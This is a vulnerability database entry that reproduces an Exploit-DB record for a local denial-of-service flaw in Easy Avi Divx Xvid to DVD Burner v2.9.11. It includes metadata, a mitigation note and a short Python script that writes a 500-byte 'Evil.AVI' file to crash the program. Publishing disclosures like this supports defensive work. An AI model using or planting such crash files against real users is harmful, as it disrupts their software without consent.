Easy Avi Divx Xvid to DVD Burner v2.9.11 - Local Denial of Service

vendor:

Easy Avi Divx Xvid to DVD Burner

by:

Hashim Jawad

5.5

CVSS

MEDIUM

Local Denial of Service

CWE

Product Name: Easy Avi Divx Xvid to DVD Burner

Affected Version From: v2.9.11

Affected Version To: v2.9.11

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP professional SP3, Windows 10 professional 64-bit

Easy Avi Divx Xvid to DVD Burner v2.9.11 – Local Denial of Service

This exploit allows an attacker to create a malicious AVI file that when opened in Easy Avi Divx Xvid to DVD Burner v2.9.11, will cause a denial of service on the local system.

Mitigation:

Update to a patched version of the software or use an alternative software.

Source

Exploit-DB raw data:

#!/usr/bin/python
###########################################################################################
# Exploit Title      : Easy Avi Divx Xvid to DVD Burner v2.9.11 - Local Denial of Service #
# Exploit Author     : Hashim Jawad                                                       #
# Twitter            : @ihack4falafel                                                     # 
# Author Website     : ihack4falafel[.]com                                                #
# Vendor Homepage    : http://www.divxtodvd.net/index.htm                                 #
# Vulnerable Software: http://www.divxtodvd.net/easy_divx_to_dvd.exe                      #
# Tested on OS       : Windows XP professional SP3                                        #
#                      Windows 10 professional 64-bit                                     #
# Steps to reproduce : Add Evil.AVI and BOOM!                                             #
###########################################################################################

buffer = "A" * 500

try:
	f=open("Evil.AVI","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"